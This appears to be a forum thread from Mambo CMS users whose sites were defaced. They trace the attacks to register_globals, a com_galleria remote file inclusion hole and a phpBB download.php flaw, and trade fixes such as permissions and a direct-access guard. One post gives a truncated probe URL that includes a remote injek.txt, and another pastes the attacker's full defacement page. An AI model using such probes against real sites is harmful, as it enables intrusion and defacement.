Mambo Hacked?!?

[Saladir]

Hello,

today my site was hacked twice! The file index.html in the root directory was changed! I updatet ti the latest 4.5.4 version of mambo but it did not help anything. A also changed the Passwords for my FTP-Account and so on.

With the second hack i had a file called index.html in my root directory!

I do not know waht to do.

I hope someone else can help me here.

[thegent]

unzip the mambo install

copy the root files to your site to overwrite the existing ones
EXCEPT configuration.php

[mambomod]

Please note, these are not mambo specific hacks. This is a problem caused by having directories set to 777 permissions. This makes a hackers life very easy and they can places files into those directories.

You may need to ask for help from your host in securing your website as they may need to change the ownership of some of the directories to your ftp user. You can then look at changing directories to chmod 755 and files to chmod 644 which will mean that the web user (apache for example) will not be able to insert or modify any files/folders. If you do need to install new components or templates etc, then you can change the necessary folder to chmod 777 for a short time and then change it back when you are finished.

The hacking of web servers seems to be on the increase and is not only happening with mambo sites.

Prevention is better than cure

Hope this helps.

[Saladir]

Thanks for the help. But my Directories have already the permission 755 and the files 644?!? so i don't know how hackers can do sometinhg like that.

My Provider said that some is wrong in PHP-Code of Mambo (/components/com_galleria/galleria.html.php) there is a parameter (mosConfig_absolute_path) wich allows to execute own code on the machine.

In the post before i said, that i updated mambo to 4.5.4. And i read that there is something wrong with the emulation of register_globels in earlier versions. I also found a test (when you can call it a test) where you can look that your site is safe. The result of the test is, that my site should be safe.

[mambomod]

Ahh ok. There have been quite a few attacks on mambo sites lately where additional components have been attacked and their vulnerabilities exploited. The best thing to do is make the author of the component aware of the problem and they will usually provide a patch asap.

There is also a link here that should lead you in the right direction.

Hope this helps.

[Saladir]

Hallo,

thanks for the link, but i cant read the post, because i do not understand that language.

I found the reason for the hacks!

My provider did enable the php-variable register_globals. This is why my site was hacked. Here is a sample link, so that you can check your site.

http://www.your-site.domain/componen...nfo/injek.txt?

When there is displayed i asite with many things you can do, than your system can easily be hacked (i tested it myself).

What you have to do is either set register_globals to OFF or edit the PHP-Script (/components/com_galleria/galleria.html.php) and add the line below before the first php code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

after that this PHP-Script should be safe.

[Duck_Master]

I had my site hacked also but I dont have galleria on my site. Now what happen was my configuration.php was changed. I also have 4.5.4 version. This is what was changed.

Code:

<html>

<head>
<META NAME="Title" CONTENT="ENO7 (TURKISH HACKER)">
<META NAME="Subject" CONTENT="HACKED BY ENO7 (TURKISH)">
<META NAME="Description" CONTENT="eno7 was here, HACKED BY TURKISH HACKER ENO7">
<META NAME="Distribution" CONTENT="Global">
<META NAME="Robots" CONTENT="All">

<meta http-equiv="Content-Language" 

content="tr">
<meta name="GENERATOR" 

content="Microsoft FrontPage 5.0">
<meta name="ProgId" 

content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" 

content="text/html; charset=windows-1254">
<title>ENO7 (TURKISH HACKER)</title>
</head>

<body bgcolor="#000000">

<p>&nbsp;</p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" id="AutoNumber1" bordercolordark="#333333" bordercolor="#333333">
  <tr>
    <td>
    <p align="center"><strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="6">
    <a style="TEXT-DECORATION: none" href="http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,eno7/" target="_blank">
    <font color="#FFFFFF">eno7</font></a><font color="#FFFFFF"> was here</font></font><font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="#FFFFFF">&nbsp;
    </font></strong></p>
    <p align="center"><strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="#FFFFFF">
    <span lang="en-us">&quot;Turkish</span> <span lang="en-us">Hacker&quot;</span></font></strong><p align="center">
    <strong><span lang="en-us">
    <font face="Verdana, Arial, Helvetica, sans-serif" color="#666666">Wait and 
    Watch Flash &gt;&gt;&gt;&gt;&gt;</font></span></strong><p align="center">
    <strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#FF0000">
    STRUGGLE FOR A WORLD WITHOUT WAR</font></strong><p align="center">
    <font face="arial, helvetica, sans-serif" size="-1" color="#FFFF00">
    <span style="background-color: #000000">Your</span><span style="background-color: #000000"> 
    click helps feed the hungry with the value of 1.1 cups of staple food.</span></font><p align="center">
    <a target="_blank" href="http://www.thehungersite.com/cgi-bin/WebObjects/CTDSites.woa/452/wo/MN4000Id000rn400t3/0.0.47.7.0.1.0.0.0.CustomContentActiveImageDisplayComponent.0.0.0">
    <img border="0" src="http://imageserv01.yss4.com/images/cache/0xf3632796437283bfc0a80a36.gif" width="244" height="47"></a></td>
    <td>
    <p align="center">
      <embed width="438" height="221" 

src="http://www.95034.it/public/up/coin.swf"></td>
  </tr>
  <tr>
    <td>
    <p align="center"><font size="2"><span style="background-color: #000000">
    <font color="#C0C0C0">just mail:</font></span><span style="font-weight: 700; background-color: #000000"><font color="#FFFFFF">
    </font></span><font color="#c0c0c0">
    <a style="text-decoration: none; background-color: #000000" href="mailto:leno7l@gmail.com">
    <font color="#FFFFFF">leno7l@gmail.com</font></a></font></font><span style="background-color: #000000"><font size="2" color="#FFFFFF">
    </font></span></p>
    <p align="center"><span style="background-color: #000000">
    <font color="#C0C0C0" size="2">greetz :</font><b><font color="#FFFFFF" size="1"> </font>
    </b><font size="2" color="#FFFFFF">Team-Evil 
    , </font></span>
    <font color="#FFFFFF"><span class="defaulttext">
    <span style="background-color: #000000"><font size="2">aLpTurkTegin ,</font></span></span><span style="background-color: #000000"><font size="2"> 
    iskorpitx , Metlak , </font></span>
    </font>
    <font style="font-size: 8pt; background-color: rgb(0, 0, 0);" color="#FFFFFF" face="Verdana">
    ATAKAN</font><font color="#FFFFFF"><span style="background-color: #000000"><font size="2"> 
    , </font></span>
    </font><span style="background-color: rgb(0, 0, 0);">
    <font style="font-size: 8pt;" color="#FFFFFF" face="Verdana">GençTürk ,&nbsp;
    </font></span>
    <font color="#FFFFFF"><span style="background-color: #000000"><font size="2">Byond crew , PHoeNiX , </font></span>
    </font>
    <font style="font-size: 8pt; background-color: rgb(0, 0, 0);" color="#FFFFFF" face="Verdana">
    Yusuf ,</font><font color="#FFFFFF"><span style="background-color: #000000"><font size="2"> </font></span>
    <span class="defaulttext"><span style="background-color: #000000">
    <font size="2">Eddy_BAck0o , ameer ,Pablin77 , Furtivo , PoWeRFuL</font></span></span></font></p>
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber2" bordercolorlight="#000000" bordercolordark="#000000" height="23">
      <tr>
        <td width="100%" bordercolor="#000000" bordercolorlight="#000000" bordercolordark="#000000" height="23">
        <p align="center"><span class="defaulttext">
        <span style="background-color: #000000"><font color="#FF0000">
        AYYILDIZ TIM</font></span></span></td>
      </tr>
    </table>
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber3" bordercolor="#FF0000" height="11" bordercolorlight="#000000" bordercolordark="#000000">
      <tr>
        <td width="100%" bordercolor="#000000" height="11" bordercolorlight="#000000" bordercolordark="#000000">
        <p align="center"><font color="#FF0000">DELTA SALDIRI TIMI</font></p>
        <p align="center"><font color="#FFFFFF">Üstteki sarı butana tıkladıktan 
        sonra açılan sayfadaki sponsor sitelerin herhangi birine tıklamanız 
        dünyadaki aç çocuklara yapılan yemek yardımında katkınız olmasını 
        sağlıyor.</font></td>
      </tr>
    </table>
    </td>
    <td>
    <p align="center">
      <img border="0" src="http://www.95034.it/public/up/war.jpg" width="295" height="220"></td>
  </tr>
</table>

</body>

</html>

Can anyone help with how this happen and how to avoid this again?

Thanks

[judesoul]

Duck..i think you need to set your configuration.php unwritable..like set it to CHMOD 644.

[Duck_Master]

Quote:

Originally Posted by judesoul

Duck..i think you need to set your configuration.php unwritable..like set it to CHMOD 644.

It was set to 644 and still at 644. I uploaded the old configuration.php and checked to make sure it was 644. All the files are 644.

[mambomod]

Hi,
Are you sure it was your configuration.php file changed and not an index.html file placed in your mambo directory?

[Duck_Master]

Quote:

Originally Posted by mambomod

Hi,
Are you sure it was your configuration.php file changed and not an index.html file placed in your mambo directory?

The above code I placed was directly from my configuration.php file and not a html file. My configuration.php was re-written.

[mambomod]

ahh ok..was just checking. Some people have have index.html files changed too.

Do you have access to the access/error logs on your server to check when the file was last access and written too. This may help narrow down the cause.

[Duck_Master]

Here is what it looked like on my site. I did a search on the hacker and this site came up with the mambo. http://www.neolithuania.lt/

[mambomod]

You may have to go through the folders of your site and check to see if you can find any files that shouldnt be there and remove them. I would sort by date and check any files that have been changed recently. I would also avoid clicking on any of the links on the hacked page your site was change to as they look a little nasty.

If you havent already done so I would get rid of your configuration.php file and replace it with a backed up one.

[Duck_Master]

I am going through all my files and also my logs to determine the last time that the site was accessed on certain files. I will post them tomorrow and hope we can find a solution to avoid this from happening again and also to inform everyone what to do if it happens to them.

Thanks Admin's for your help

[Saladir]

Hi Duck_Master,

please check wether register_glöbals is ON or OFF. Maybe you hav another plugin wich has the same security lack as my galleria.

If it is so, please search the component and then first try to update it. If nothing was changed then look into php-code an and add the following line to the code (before sometinhg else is done)

PHP Code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.'); 


Saladir

[mindtonic]

I just wanted to add in that I too was hacked in the exact same manner described above. My entire configuration file was changed. I still am not back up and running...

The saddest part is that the hacker did not even read our site. If his message is to end world hunger, that is in the top three of our mission statement... I guess the point is more malicious than benevolent... (duh...)

[Duck_Master]

I found out how they hacked into my site and it was pretty disturbing the access they were given from this certain file. I looked into my access log and saw a weird area that dealt with my phpbb component. Now I am running phpbb 2.0.16 on my mabo site and how they were able to hack in was through the download.php file. I grabbed the information that was in my log and ran it myself and to my surpise they were able to see every file that I had on the server and able to download and upload to the server. Here is a PIC of it.



What I did was remove the download.php file at this time and trying to get some response back from phpbb on this. I will not release the access on how they did it to the public but will send a PM to the admins here. If anyone else has this download.php from the phpbb forum please remove it and get help from phpbb on this. Once I get ingormation on this I will post it here then.

Thanks Everyone!!!

[Deviation]

2.0.21 is the latest version of phpBB. You're a couple revisions behind.

[Duck_Master]

I dont know if the new phpbb has been ported for Mambo yet.